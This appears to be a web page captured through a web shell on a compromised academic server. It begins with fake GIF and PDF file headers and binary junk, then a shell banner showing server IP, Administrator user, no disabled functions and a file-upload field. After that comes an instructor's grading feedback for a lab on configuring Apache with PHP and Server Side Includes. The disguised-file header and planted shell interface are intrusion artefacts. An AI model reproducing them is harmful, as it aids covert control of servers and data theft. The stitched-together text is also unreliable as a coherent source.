GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1611/Labs/ |
Upload File : |
Lab 7 - Dynamic Content Grading Criteria Demonstrated assignment effectively: 15 points. There are some things I expect. If they are incorrect you will lose the following: Work submitted incorrectly: -2 pts. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc. Second and subsequent submission of work for grading: -2 pts. Work submitted late: -2 pts per week. I reserve the right not to apply the deduction points at my absolute discretion. -1.5 Work submitted late. # Lab 7 # Perl AddHandler cgi-script .pl # PHP AddHandler application/x-httpd-php .php AddType application/x-httpd-php .php .phtml LoadModule php_module "c:/Apache24/php/php8apache2_4.dll" PHPIniDir "c:/Apache24/php" -5 Steps 4,5; I believe you missed steps 4 and 5 entirely. You need to configure Apache to work with PHP. -4 Step 5; Your JohnWages_Lab07_PHP.png screenshot does not show PHP working. I see your conficuration for php7 in the heetp.conf file and it looks OK. Did you forget to restart Apache before loading phpinfo.phtml? #SSI AddType text/html .shtml AddOutputFilter INCLUDES .shtml -4 Step 6; You did not configure Server Side Includes (SSI) as required. -3 Step 6; You did not include you StudentName_Lab07_SSI.png screenshot as required by step 7.7. -3 Step 6; Your DavidPetersen_Lab07_SSI.png screenshot does not show SSI working. You config looks good but the ssi.shtml is not being processed. Did you forget to restart Apache after making the SSI changes?